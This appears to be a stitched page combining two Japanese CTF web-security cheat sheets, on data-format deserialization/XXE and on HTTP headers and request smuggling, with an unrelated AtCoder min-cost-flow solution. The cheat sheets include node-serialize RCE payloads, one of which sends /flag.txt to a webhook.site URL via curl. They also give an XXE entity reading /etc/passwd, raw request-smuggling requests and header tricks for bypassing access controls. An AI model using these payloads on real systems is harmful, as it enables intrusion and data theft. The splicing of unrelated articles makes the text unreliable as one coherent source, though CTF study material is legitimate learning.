この記事はCTFのWebセキュリティ Advent Calendar 2021の4日目の記事です。

本まとめはWebセキュリティで共通して使えますが、セキュリティコンテスト（CTF）で使うためのまとめです。
悪用しないこと。勝手に普通のサーバで試行すると犯罪です。

データ形式

• Web上では様々なデータ形式が利用される。これらのデータ形式には固有の問題がいくつかあり、脆弱性を意識して利用する必要がある
• インジェクション
  • どのようなデータ形式でもバリデーションとかサニタイズせずに入れると、構造を変化させて、想定外動作を引き起こす可能性がある
• Insecure Deserialization
  • 入力されたシリアライズドデータをサーバ側で処理する過程、デシリアライズの段階で意図せぬ処理を引き起こさせること
  • RCEできたりする（RCEはWebサーバ上で自由にコマンド実行ができてしまうということ）

JSON

• インジェクション/JSON Interoperability
  • JSONの構造を書き換えて属性を追加したり、同一キーを複数個入れることでSmugglingを狙うものがある
  • An Exploration of JSON Interoperability Vulnerabilities
    • {"id": 1, "id": 2}がJSONパーサーによって解釈違いを引き起こす
• Insecure Deserialization
  • nodejsのnode-serialize
    • ベースを作って、書き換えたい部分を即時実行関数式に変換する
    • CTFtime.org / Zh3r0 CTF V2 / sparta
      • {"rce":"_$$ND_FUNC$$_function (){require('child_process').exec('ls /', function(error, stdout, stderr) {console.log(stdout) }); }()"}
      • city=_$$ND_FUNC$$_function(){require(\"child_process\").exec(\"output=$(cat /flag.txt);curl webhook.site/9d7268ea-42bd-48b3-9ede-0be524e773e1?out=$output\",function(error, stdout, stderr) { console.log(stdout)});}()
        • 実行して適当な所に送るやつ
      • {"username":{"toString":"_$$ND_FUNC$$_(()=>{throw require('child_process').execSync('cat /flag.txt')})()"}}
  • nodejsのjavascript-serializer
    • toStringを入れることで文字列として使用される場合に任意コマンド実行される
    • "evil": { "toString": { "___js-to-json-class___": "Function", "json": "console.log('hello!');return'res';" } }
• JSONP
  • JSONをvbscriptとして読み込ませるJSONハイジャック(CVE-2013-1297)に注意 | 徳丸浩の日記
  • XSSI and JSONP leaks · EdOverflow/bugbountywiki Wiki
    • ここにあるように適当にCSRFできそうなサイトを立ち上げて踏ませれば、相手権限で得たレスポンスを抜き取れる
  • JSONPは危険なので禁止 – yohgaki's blog
• JWT → 別途
• メモ
  • JSONで制御文字を入れ込むときはunicode表現にして入れる {"username": "admin\u0000"}

XML

• XMLそのものとして使われる場合もあるし、RSS,SAML,SVG,Microsoft Officeファイルの一部として現れても来る
• XXE
  • XMLの脆弱性と言えばコレ。XMLの外部エンティティ参照を対象とした脆弱性を狙う攻撃であり、LFIをしたり、RCEをしたり、SSRFをしたりできる
  • LFI
    • <!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>と書いて&xxe;を埋め込む
    • エラー経由でのLFI
      • Full Local File Read via Error Based XXE using XLIFF File | pwn.vg
      • エラーが出る場所があれば、そこに埋め込むことでエラーメッセージから情報流出させることができる
  • RCE
    • まだ、自分はやったことないが、RCEできるらしい。
    • expect://idでidコマンドが動くかを確かめる
    • From XXE to RCE with PHP/expect — The Missing Link - Airman - Medium
  • SSRF
    • Full Local File Read via Error Based XXE using XLIFF File | pwn.vg
      • 以下で反応が来るかどうかでSSRFわかる
  • DoS
    • デシリアライズ時に結果が膨大となるボムが存在する
    • XML Bombあるいはeneity explosionと呼ばれる。
    • Algorithmic complexity attackの一種で、組合せ爆発を引き起こすことで負荷をかける。
    • Billion laughs attack - Wikipedia
  • 多段XXE
    • Detecting Chained XXE (XML External Entity) to DOS (Denial of Service) or SSRF (Server Side Request Forgery) using ShiftLeft Ocular | by Chetan Conikee | Medium
    • WreckTheLine writeups
  • XMLを含むファイルを入れ込む時
    • xmlに含まれるような文字列を含んだファイルをfile://とかでインジェクションしようとすると失敗する。
    • What Are XML External Entity (XXE) Attacks
    • ここに外部DTDファイルを読み込むことで回避する方法が紹介されている。
  • XXE on JSON Endpoints
    • jsonをPOSTで受け取る部分は実はXMLにしても受け取れる状態になっててXXEできないかというもの
    • この受け取れる状態というのはフレームワークによってはどっちでもOK状態になっているのではないかと推測
  • SVG CTFtime.org / P.W.N. CTF / SVG2PNG / Writeup
  • docx
    • docemを使ってpackingし直す
      1. ベースのdocxファイルをzip拡張子に変えて解凍
      2. 中身をXXEで改変
      3. docemを使って再pack python ./docem.py -s evil -sx docx
         • evilはevilフォルダでtempフォルダに結果が出力される
    • wavファイルでXXE
      • WordPress の XXE(CVE-2021-29447) やる - まったり技術ブログ%E3%82%84%E3%82%8B)
      • wavファイルにはxmlでメタデータを記載するiXMLチャンクというのが指定できる。ここでXXEする
        • ファイル出力されてこないのでBlind XXEをしてOOBの要領で情報を抜き出す
  • Blind XXE
    • WordPress の XXE(CVE-2021-29447) やる - まったり技術ブログ%E3%82%84%E3%82%8B)
    • SonarSource Blog » WordPress 5.7 XXE Vulnerability
    • What is a blind XXE attack? Tutorial & Examples | Web Security Academy
  • 参考
    • 詳解セキュリティコンテストのXXEが日本語で最も詳しいと思う
    • わかりやすすぎる https://www.slideshare.net/ebihara/phpcon-20
    • XXE攻撃 基本編 | MBSD Blog
    • EXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY
    • XXE in IIS/.NET: SANS Penetration Testing | Exploiting XXE Vulnerabilities in IIS/.NET | SANS Institute
• Insecure Deserialization
  • ライブラリによるかもしれないが、RCEまでつなげるにはGadget Chainをつなげる必要がある
  • GadgetというのはInsecure Deserializationによって呼出可能で、かつ、コマンド実行につなげることができるクラスやライブラリのことを言う
    • なのでRCEできるのは、Insecure Deserialization脆弱性がある、かつ、Gadget Chainとして呼出可能ならGadgetが存在する場合になる
    • Gadgetという言葉の意味する所の把握が難しいが、Prototype Pollutionとかでも出てくるからふんわり意味を理解しておくと情報が入ってきやすくなる
• SAML Injection
  • SAML XML Injection – NCC Group Research

他のInsecure Deserialization

• pythonのpickle
  • pickleとはpythonのインスタンスをシリアライズしてくれるもの
  • OWASP Insecure Deserialization with Python | David Mata blog
  • not enough values to unpack (expected 3, got 2)というエラーはpickleっぽい
  • __reduce__メソッドはpickle.loadするときに発動して、文字列に入れ替わる
  • pickle.load(ここ！)に対してインジェクションできれば、発動させられる
• phpのserialize/unserialize
  • 外部からデシリアライズするデータを渡せるとき、意図しないクラスの意図しない状態のインスタンスを生成するテク 徳丸さん記事 OWASP
  • オブジェクトの変数（プロパティ）をインジェクションできる
    • デシリアライズ時に__constructは呼ばれない
    • だが、__destructや特殊な関数は呼ばれる可能性があり、そこでインジェクションしておいた変数の値を使って、いろんなことを行う ここに網羅されてる
      • とりあえず__wakeup()と__destruct()が呼ばれる
  • Remote code execution through unsafe unserialize in PHP
    • PHPでも、Gadget chainがある
  • シリアライズされたものに含めることができるのは変数だけ。変数を入れこむ感じでシリアライズする。
  • protectedの変数の場合は変数名に特殊文字が入り込むので、シリアライズ化するときはurlencodeして取り出したほうが、おかしくなりにくい
  • 問題
    • websec level04
    • CTFtime.org / Kaspersky Industrial CTF 2018 / expression
• Phar, PHPアーカイブ
  • Exploiting PHP Deserialization: CCCamp19 CTF PDFCreator Challenge
  • Exploiting PHP Phar Deserialization Vulnerabilities: Part 1 | Keysight Blogs
  • CTFtime.org / Tenable CTF 2021 / Phar out
• ASP.NET
  • Unsafe ViewState Deserializationがあるっぽい
    • Exploiting ViewState Deserialization using Blacklist3r and YSoSerial.Net - NotSoSecure
• Unsafe Java Object Deserialization
  • .NETのときと同様にgadget chainしてコード実行に持ち込む
    • GitHub - frohoff/ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
  • Java Deserialization — From Discovery to Reverse Shell on Limited Environments | by Francesco Soncina (phra) | ABN AMRO — Red Team | Medium
    • change Runtime exec(String) to exec(String[]) · Issue #71 · frohoff/ysoserial · GitHub
    • code white | Blog: $@|sh – Or: Getting a shell environment from Runtime.exec
  • Javaの安全でないデシリアライゼーションの攻撃に、ysoserialがよく使用される https://github.com/frohoff/ysoserial
    • ysoserialをforkしてpayloadを追加するなど機能拡張しているリポジトリが公開されている（特にTomcatにメモリWebShellを設置する機能追加が多い）
      • Tomcatのセミユニバーサルエコー方式
        • 解説記事：https://xz.aliyun.com/t/7348
        • リポジトリ：https://github.com/kingkaki/ysoserial
      • グローバルストレージに基づく新しいアイデア|一般的なエコー方式に関するTomcatの調査
        • 解説記事：https://mp.weixin.qq.com/s?__biz=MzIwMDk1MjMyMg==&mid=2247484799&idx=1&sn=42e7807d6ea0d8917b45e8aa2e4dba44
        • リポジトリ：https://github.com/Litch1-v/ysoserial
      • TomcatベースのメモリWebshel​​lファイルレス攻撃テクノロジー
        • 解説記事：https://xz.aliyun.com/t/7388
        • リポジトリ：https://github.com/threedr3am/ysoserial
      • CommonsBeanutilsとcommons-collectionsを使用しないShiroの逆シリアル化の利用
        • https://www.leavesongs.com/PENETRATION/commons-beanutils-without-commons-collections.html
        • https://github.com/phith0n/JavaThings
• Rails
  • Deserialization on Rails

この記事はCTFのWebセキュリティ Advent Calendar 2021の2日目の記事です。

本まとめはWebセキュリティで共通して使えますが、セキュリティコンテスト（CTF）で使うためのまとめです。
悪用しないこと。勝手に普通のサーバで試行すると犯罪です。

HTTP

• どこを見て学習してもいいのだが、MDNを参照するのが一番オススメ
  • HTTP の基本 - HTTP | MDN
  • 難しめに書いてあるので、他のもう少し優しく書いてあるもので勉強してから、辞書的に戻ってきてもいいかも
• HTTPメソッド
  • たまにGETで取得しているのをPOSTにしてみたりPUTにしてみるとフラグが出たりする（大体、メソッドを変えてみてね見たいな誘導が問題中にある）
  • Software Security | HTTP Verb Tampering
    • メソッド込みでブラックリスト作ってても、注意しないと意外な所から呼ばれてbypassされるかも
• HTTPステータス番号
  • あまりCTFでは問題になってこないが、読めるようになると色々把握しやすい
• Content-Type (MIME Type)
  • application/x-www-form-urlencoded
    • フォームのやつ
    • bodyにはx=a&y=bみたいにする
  • application/json
    • json形式
    • bodyには{"x":"a", "y":"b"}とする
  • application/x-yaml
    • yaml
• エンコードについて
  • GETパラメタの中身とか、BODY部分ではURLエンコーディングされている場合がある
  • 空白を%20とするか+にするかで使い分けされているので注意
• テク
  • IPアドレス制限などで403応答があっても、適当に127.0.0.1をヘッダーで指定すればbypassできるかも
    • BugBountyTips.techさんはTwitterを使っています 「You can bypass WAFs using a simple Match&Replace rule in Burp Suite, I used it and I simply bypassed a WAF restriction just now. I Covered the Syntax and the Headers you can use. #BugBounty #BugBountyTip #BugBountyTips #TogetherWeHitHarder #InfoSec https://t.co/lrmw0vX7QJ The… https://t.co/nmofXM5Xbi」 / Twitter
• GETパラメタ
  • HTTP parameter pollution
    • Client-side HTTP parameter pollution - 妄想まとめ
    • 同名のパラメタがあった場合の処理の仕方が色々異なる
      • ASP.NETでは同名があったら結合するので、これを利用したWAFのbypassが可能
    • HTTP Parameter Pollution | Imperva
    • ここに微妙にまとまっている https://miro.medium.com/max/2400/1*POs4sP0fQVlPvTH9vw1U-A.jpeg
  • GETパラメタの配列化
    • #792895 bypass old password with array in /admin/account-user-email.php
      • 昔のパスワード部分を配列化することで判定をバイパスしている
      • CTF Password Reset Writeup | HTTP Parameter Pollution | TrollCat CTF Writeup | by Bipul Jaiswal | Feb, 2021 | Medium

HTTPのHeaderまとめ

• Referer: https://www.google.com
  • 直前のページのURL
• X-Forwarded-For: 123.123.123.123
  • 送信IPを偽装したいときに使用
  • PHPなら$headers = apache_request_headers(); $ip = $headers[‘X-Forwarded-For’];で取ってくる
  • 元々はプロキシサーバ経由でも元々のIPを特定できるようにしたもの X-Forwarded-For - HTTP | MDN
  • remote_addrとかx-forwarded-forとかx-real-ipとか - Carpe Diem
  • CTFtime.org / ångstromCTF 2021 / Spoofy
    • heroku上に構成されたサイトで、X-Forwarded-Forを使って1.3.3.7経由であるかを確認している
    • Flask apps on Heroku susceptible to IP spoofing
      • client --> cloudflare --> heroku --> appとなっていたらX-Forwarding-For: client.ip.addr, cloudflare.ip.addr
        • herokuは追加しないと？と思ったが、問題ではくっついているように見える。分かってない
    • The tale of Clojure, Heroku and X-Forwarded-For – Igor Bondarenko
      • こういう場合でもX-Forwarded-Forを複数つければbypass可能
    • curl https://actf-spoofy.herokuapp.com/ -H "X-Forwarded-For: 1.3.3.7" -H "X-Forwarded-For: , 1.3.3.7"
    • curl https://actf-spoofy.herokuapp.com/ -H X-Forwarded-For: 1.3.3.7" -H "X-Forwarded-For: <random_ip>, 1.3.3.7"
      • CTFtime.org / wtfctf / M4sk3r / Writeup
• X-Forwarded-Host: attacker.com
  • これをつけるとHostヘッダーの値を見て、URLを作っているようなサイトだと、こっちに書き換えることができる
  • [PoC] Host Header Hijacking in Niteflirt - YouTube
  • パスワード変更時のリンクを奪取するのに使えたりもしますね
• X-Content-Type-Options: nosniff
  • このヘッダーがあると、ファイルの種別はContent-Typeから判断させることができるので、IEのcontent sniffingを抑制できる
  • とりあえず必須でつけときゃいいっぽい
    • X-Content-Type-Options: nosniff つかわないやつは死ねばいいのに! - 葉っぱ日記
    • X-Content-Type-Options: nosniff はIE以外にも必要 – yohgaki's blog
• Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
  • HSTSについての設定
  • HSTS？
    • HSTSとはHTTP接続してきたリクエストに対し、安全にHTTPSに対してリダイレクトさせようとする技術
    • 今までは？
      • 今までの流れは「HTTPリクエストが来る→HTTPレスポンスでhttpsアドレスへリダイレクト要求→HTTPSリクエスト」
      • これだと、HTTPリクエストの過程で中間者攻撃の可能性がある
    • HSTSにはブラウザに対して、このドメインではHTTPS通信してねという要請をヘッダーで行う
      • 1回目のHTTPリクエストはしょうがないが、2回目以降は期限が切れてなければ要請が続くのでHTTPSで安全
      • 最初の1回目も無くそうということでpreload機能というのもある
    • HTTPの口をふさげばいいのでは？
      • 古いサイトだとHTTPでリンク張られたりするから、現実的じゃないパターンがあるのかも
      • 色々調べたけど、決定打は見つからなかった
      • それでは最初の接続時にcookie情報を抜き出されることを防げない。cookieにsecureをつけとけば大丈夫
  • Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
    • max-age: 有効期限。ここで規定されてる10886400秒（18週）以上がスタンダード？ 出典
    • includeSubdomains: 名前の通り
    • preload: 仕様にはないオプション。GoogleのHSTS先読みサービスにドメインを登録して、preloadオプションをレスポンスに含めれば、1回目であってもHTTPではなくHTTPSでつないでくれるようになる。 HSTS（HTTP Strict Transport Security）について詳細、設定方法を解説します | 株式会社レオンテクノロジー
  • preloadにしたURLがChromiumに送られてリスト化されているけど、ステージング環境とかがここに入ってこない？その辺大丈夫？
    • ステージング時は気を付けるべきでは？
• Feature-Policy: fullscreen 'self'
  • Feature PolicyおよびFeature unsized-mediaの導入ガイド - 銀色うつ時間
    • とても分かりやすい。なるほど。
  • フルスクリーンを抑制できるっぽいが、セキュリティ的なうまみがあるんだろうか
    • ぱっと考えてみると、バナー広告とかが攻撃者に乗っ取られてフルスクリーンを強制するとか？
    • いい記事も、いい攻撃例も思いつかないが、脅しには使えそうな感じはする
• Referrer-Policy: no-referrer
  • スペルミスが直されている。重複の読み方みたいにrefererでもreferrerでもどっちでもいいと思ってた
  • Refererの指定方法についてのポリシーを通知する。ブラウザへのお願いかな？
  • Referrer-Policy - HTTP | MDN
    • ここを見るとHTMLのタグでも同様のことが行える。ブラウザへのお願いだろう。
• X-Frame-Options: DENY
  • このレスポンスのページをframeの内部で表示することができるかを指定する
    • クリックジャッキング対策
  • この場合はDENYなので、どんなframeの内部でも表示されない
  • 昨今表示させることはセキュリティリスクぐらいしかないので、DENY固定でいいんじゃないかな？
• X-XSS-Protection: 1; mode=block
  • ブラウザのXSS防御機構を呼び出すもの
  • X-XSS-Protection - HTTP | MDN
    • ここにもあるように、ChromeがXSS Auditorを止めたのは有名な話
    • 今って、このヘッダーってどういう立ち位置になってるんだろう
  • 正直ブラウザ側が放棄したヘッダーを使うのは少し怖い気がする
    • メンテが終わった機能を使い続けてしまう恐れ
• Content-Security-Policy: default-src 'none'; img-src 'self'; style-src 'self' 'unsafe-inline'; script-src 'self'; font-src 'self'; base-uri 'none'; frame-ancestors 'none'; form-action 'none'; manifest-src 'self'
  • まあ、CSPはいいでしょう。
• Cross-Origin-Opener-Policy
  • Cross-Origin-Opener-Policyについて - ASnoKaze blog
  • openerについての制約用ヘッダー
• Fetch Metadata Request Headers
  • Fetch Metadata Request Headersって何ですか？ - Qiita
  • Fetch Metadata Request Headers (Sec-Fetch-*) って何？ - Qiita
• 日付を指定できる Date: Wed, 21 Oct 2018 07:28:00 GM
• UA User-Agent: picobrowser
• DNT - HTTP | MDN
  • Do Not Track
  • DNT: 0 track ok DNT: 1 track ng DNT: null N/A
• Range
  • 一部持ってきたいときにつける
  • サーバーからAccept-Ranges: bytesとあればRangeがbyte単位で指定して使える
    • CakeCTF 2021 Writeup - 0xiso’s blog
    • nginxの設定ファイルでフラグのパターンマッチで引っかかればマスクされるようになっているのでRangeを使って分割して持ってくる
    • Range: bytes=0-10で前半持ってきて、Range: bytes=8-で後半持ってくる感じ

HTTP Request Smuggling

• HTTP Request Smuggling を理解する - Qiita
  • リバースプロキシとバックエンドサーバでリクエストの終端の解釈が異なる場合に発生する脆弱性
• HTTP Desync攻撃
  • HTTP Request Smuggling を理解する - Qiita
  • Black Hat USA 2019: 今注目すべき Web セキュリティ関連トピックの解説 - Flatt Security Blog
  • Transfer-Encoding - HTTP | MDN
    • ここを見ると、Transfer-Encoding: chunkedが認識されたら、Content-Lengthは省略されるらしい
  • HAProxyとgunicornの組合せは、TE-CL攻撃ができる
    • DefCon CTF Quals 2020 - HTTP Desync between HAProxy & Gunicorn
    • CTFtime.org / DEF CON CTF Qualifier 2020 / uploooadit / Writeup
    • chunkedの前にバーティカルタブを置いて、チェックをバイパスする
    • HAProxy HTTP request smuggling · GitHub
    • GitHub-BronyUraj / SecretTactics-Write_Up：SPRUSHCTFの書き込み
      • ロシア語だけど、リクエストを見ると、何が起きているかはわかりやすい
      • 2つまとめて送る。前半が応答されてかえって来るけど、後半は誰かからリクエストが着たらそれがpostの所に入って自分の投稿として反映される。それを見ることで違う人のリクエストを傍受することができる。
  • Smuggler - An HTTP Request Smuggling / Desync Testing Tool — SkyNet Tools
  • 発展形なんかな？
  • 問題
    • CTFtime.org / Circle City Con CTF 2021 / Sticky Notes
• 403 Forbidden bypass
  • https://twitter.com/intigriti/status/1222868788070227970?ref_src=twsrc%5Etfw%7Ctwcamp%5Etweetembed%7Ctwterm%5E1222868788070227970%7Ctwgr%5E&ref_url=https%3A%2F%2Fwww.redditmedia.com%2Fmediaembed%2Few5k2w%3Fresponsive%3Dtrueis_nightmode%3Dfalse
  • http://example.com/./hidden.htmlはhttp://example.com/hidden.htmlとして解釈される
  • /hidden.htmlが403になるような設定になっていれば、こうすれば/./hidden.htmlとなってバイパスできる
• X-HTTP-Method-Override
  • CTFtime.org / Square CTF 2020 / Barrel Roll
    • 例えば、GOでリバースプロキシを書いて、rubyでフロントエンドを書いているとする
    • GOでr.PathPrefix("/contents/FLAG").Methods("GET").HandlerFunc(func(w http.ResponseWriter, req *http.Request) { http.Error(w, "Forbidden", 403) })みたいな感じ
    • curl -X POST -H "X-HTTP-Method-Override: GET" http://localhost:8090/contents/FLAGでフラグが取得できる
    • これはGOではPOSTリクエストとして解釈されるが、ruby側ではX-HTTP-Method-Overrideを考慮してGETリクエストとして解釈されるためである
    • How to exploit parser differentials | GitLabが元ネタ
    • ちなみにcurl -X POST -d "_method=GET" http://localhost:8090/contents/FLAGでも同様に突破できる
    • ここみたいな感じに任意のHTTPメソッドを指定できる。どの標準なのかは分からないが、いろんなライブラリでそういうことになってるっぽいのでデファクトスタンダード的なやつかも（まったくわかってない）
• HTTP Request Smuggling over HTTP/2 Cleartext (h2c)
  • PoC: GitHub - BishopFox/h2csmuggler: HTTP Request Smuggling over HTTP/2 Cleartext (h2c)
    • writeups/2020/Boot2root_ctf/Smuggle at master · Red-Knights-CTF/writeups · GitHub
    • これで攻撃が完了したというWriteupもある
    • pyhton3 h2csumuggler.py -x https://192.34.57.73:8001/ https://192.34.57.73:8001/flagで/flagが400errorでアク禁かかっていても情報を抜き出せている
    • READMEにある画像を見ていると、なんとなくどういうことかが分かる
      • トンネルが貼られてreverse proxyを無視した通信をしてしまうから、アク禁をバイパスできるっぽい
      • これもRequest Smugglingの1つ？
  • GitHub - neex/http2smugl
  • H2C Smuggling in the Wild – Assetnote
• CL-TEタイプ
  • RubywebrickでのHTTPリクエストの密輸| Feng Qing Yue Lang Ju
  • #965267 Potential HTTP Request Smuggling in ruby webrick
    • revproxyとしてhaproxy(CLを見る), rubyのサーバサイドwebrick(TEを見る)

POST / HTTP/1.1
Host: 127.0.0.1
Transfer-Encoding: AAA chunked BBB // haproxyはフォーマット違反なので無視, webrickはchunkedとして解釈する
Connection: keep-alive
Content-Length: 50 // haproxyはこちらを優先するから/flagまで送る, webrinkではchunkとされているのでこちらは無視

1
A
0

GET /flag HTTP/1.1 // webrinkではchunkとなっているのでこちらは別リクエストとして解釈して別途応答してしまう。
Host: 127.0.0.1    // この応答はhaproxyが介入していないので、haproxyでアクセス制限をかけていてもバイパスできる

• TE-TEタイプ
  • #1002188 Potential HTTP Request Smuggling in nodejs
    • revproxyとしてhaproxy、webサーバとしてnodejs

POST / HTTP/1.1
Host: 127.0.0.1
Transfer-Encoding: chunked // nodejsはこのTEしか認識しない
Transfer-Encoding: chunked-false // nodejsはこれを無視してchunkedで動く。haproxyはこれのせいでchunkedにならないから全体を送ってしまう？

1
A
0

GET /flag HTTP/1.1
Host: 127.0.0.1
foo: x

HTTP Response Splitting

• ヘッダーインジェクションのようにHTTPレスポンスの構造を改変可能な状態になっていると、できることの1つ
• 通称としてはHTTP Response Splittingという名前になっているが、自由にHTTPレスポンスが構築できるということなので、XSSとかキャッシュ汚染とかが可能
• 参考
  • HTTP Response Splitting Software Attack | OWASP Foundation OWASPが一番よさそう
  • IPA ISEC　セキュア・プログラミング講座：Webアプリケーション編　第7章 エコーバック対策：HTTPレスポンスによるキャッシュ偽造攻撃対策
• バグバウンティのレポートではヘッダーインジェクションからできる攻撃としてHTTP Response Splittingで出来る攻撃が紹介されていることが多い印象

HTTP/2

• GoogleのHTTP/2 and SPDY indicatorという拡張機能を入れると、HTTP2で接続されているかが分かる。ちなみにBurp Suiteなどでプロキシを挟んでいると、HTTP2にならない場合があるので注意。
• HTTP Request Smuggling over HTTP/2 Cleartext (h2c)
  • PoC: GitHub - BishopFox/h2csmuggler: HTTP Request Smuggling over HTTP/2 Cleartext (h2c)
    • writeups/2020/Boot2root_ctf/Smuggle at master · Red-Knights-CTF/writeups · GitHub
    • これで攻撃が完了したというWriteupもある
    • pyhton3 h2csumuggler.py -x https://192.34.57.73:8001/ https://192.34.57.73:8001/flagで/flagが400errorでアク禁かかっていても情報を抜き出せている
    • READMEにある画像を見ていると、なんとなくどういうことかが分かる
      • トンネルが貼られてreverse proxyを無視した通信をしてしまうから、アク禁をバイパスできるっぽい
      • これもRequest Smugglingの1つ？
  • GitHub - neex/http2smugl
  • H2C Smuggling in the Wild – Assetnote
  • 問題
    • CTFtime.org / ALLES! CTF 2020 / Push / Writeup

https://atcoder.jp/contests/past202109-open/tasks/past202109_k

前提知識

• 最小費用流
• (もしくは重み付き二部グラフ上での最大マッチング)

解説

https://atcoder.jp/contests/past202109-open/submissions/26707534

慣れていると、この問題がかなりフロー系で解けるのではないかという感じに思えてくる。
理由としてははっきり言えないのだが、

• ペアを作る、マッチングをするような問題である
• 総和の最大値を求める
• 結構微妙な制約

みたいな所からフロー感が漂う。
コストが含まれるので最小費用流で考えていくと解ける。

なお、今回の問題はよりストレートに重み付き二部グラフ上での最大マッチングとして定式化できる。
やってることは変わらないような気もするが、自分は最小費用流の延長戦上として解いた。

最小費用流

もし、最小費用流について知らない場合はどこかで調べてこよう。
最小費用流は名の通り最小値を求めるアルゴリズムであるので、入門としては最小値を求めるような問題がいいだろう。
他の問題を入門として選ぶことを勧める。

さて、理解はできているものとして話を進めていこう。

「選択」を分岐で表現する

さて、選択を作っていく。
グラフは

• 始点と終点
• オスpを表す頂点
• メスqを表す頂点

のP+Q+2頂点を用意しよう。
ここでオスpとメスqがつがいになる場合は、

始点→オスp→メスq→終点

の経路で流量1だけ流れるという風に定義しよう。

(流量,コスト)
始点-(1,0)→オスp-(1,A[p]+C[q])→メスq-(1,0)→終点

という感じである。
逆につがいにならなかった場合は、その2匹間に流れないので、

始点-(1,B[p]+D[q])→終点

ということになる。これをすべてのペアについて作っていけばいいのだが、そうすると、
始点と終点の間に複数の辺で複数のコストのものが出来上がってしまう。
これでは、うまく選択されていないペアの所に流量を流すことができなくなってしまう。
ここで1工夫加えよう。

全部選択してないことをベースに考える。

選択によって幸福度を変化させるのではなく、すべてのオスとメスは最初は含まれない状態から始めて、
つがいを作ると、そのオスとメスの幸福度が変化するという風に考えることにしよう。

より具体的には、最初は幸福度はBの総和とDの総和ということにしておく。
そして、オスpとメスqがつがいになったとしたら、幸福度が+(A[p] - B[p] + C[q] - D[q])されるということにしておく。
こうすることで選択としては、つがいにならないなら幸福度は+0だし、
つがいになったら+(A[p] - B[p] + C[q] - D[q])されることになる。

フローとして考えると、オスpとメスqがつがいになるなら

始点-(1,0)→オスp-(1,(A[p] - B[p] + C[q] - D[q]))→メスq-(1,0)→終点

であり、つがいにならなかった場合は、

始点-(1,0)→終点

のようにする。こうすれば始点と終点の間の辺はすべて同じになるので1つにまとめることができるようになる。

まとめると

さて、まとめるとフローは以下のようになる

• 始点から各オスpについて (1,0) の辺を張る
• 各オスpから各メスqについて (1,A[p] - B[p] + C[q] - D[q]) の辺を張る
• 各メスqから終点について (1,0) の辺を張る
• 始点から終点について (min(P,Q), 0) の辺を張る

min(P,Q)と書いているのはペアが作れるのは最大min(P,Q)組だけだからである。
これで最大費用流みたいな感じで流量min(P,Q)を流せば、(Bの総和)+(Dの総和)+(最大費用)が答えになる。
ここまで理解できていればほぼほぼ答え。

最小費用流ですよ…

最大ではなく最小なので、コストを逆転させて負の数にすることで最大値を負の数にしたものを答えとして
出させるようにする。

• 始点から各オスpについて (1,0) の辺を張る
• 各オスpから各メスqについて (1,-(A[p] - B[p] + C[q] - D[q])) の辺を張る
• 各メスqから終点について (1,0) の辺を張る
• 始点から終点について (min(P,Q), 0) の辺を張る

最小費用流をして流量min(P,Q)を流せば、(Bの総和)+(Dの総和)-(最小費用)が答えになる。
最小費用流はコストが正になる必要があるので、これもちょっとだめで、下駄をはかせる必要がある。
MAXを2*10⁹くらいに設定しておいて、つがいを作った場合とそうでない場合についてMAX分だけ
コストに下駄をはかせることにする。つまり…

• 始点から各オスpについて (1,0) の辺を張る
• 各オスpから各メスqについて (1,MAX-(A[p] - B[p] + C[q] - D[q])) の辺を張る
• 各メスqから終点について (1,0) の辺を張る
• 始点から終点について (min(P,Q), MAX) の辺を張る

こんな感じにする。
最小費用流をして流量min(P,Q)を流せば、(Bの総和)+(Dの総和)+MAX×min(P,Q)-(最小費用)が答えになる。
このように下駄を履かせた分だけ引けば全体を正のまま保ちつつ正答が得られる。

int P, Q;
string S[101];
ll A[101], B[101], C[101], D[101];
//---------------------------------------------------------------------------------------------------
void _main() {
    cin >> P >> Q;
    rep(p, 0, P) cin >> S[p];
    rep(p, 0, P) cin >> A[p] >> B[p];
    rep(q, 0, Q) cin >> C[q] >> D[q];

    atcoder::mcf_graph<int, ll> mcf(P + Q + 2);
    int st = P + Q;
    int gl = st + 1;
    int maxflow = min(P, Q);

    ll MAX = inf * 2;
    rep(p, 0, P) mcf.add_edge(st, p, 1, 0);
    rep(p, 0, P) rep(q, 0, Q) if (S[p][q] == '1') mcf.add_edge(p, P + q, 1, MAX-(A[p] - B[p] + C[q] - D[q]));
    rep(q, 0, Q) mcf.add_edge(P + q, gl, 1, 0);
    mcf.add_edge(st, gl, maxflow, MAX-0);

    int _; ll cost;
    tie(_, cost) = mcf.flow(st, gl, maxflow);

    ll ans = 0;
    rep(p, 0, P) ans += B[p];
    rep(q, 0, Q) ans += D[q];
    ans += MAX * maxflow - cost;
    cout << ans << endl;
}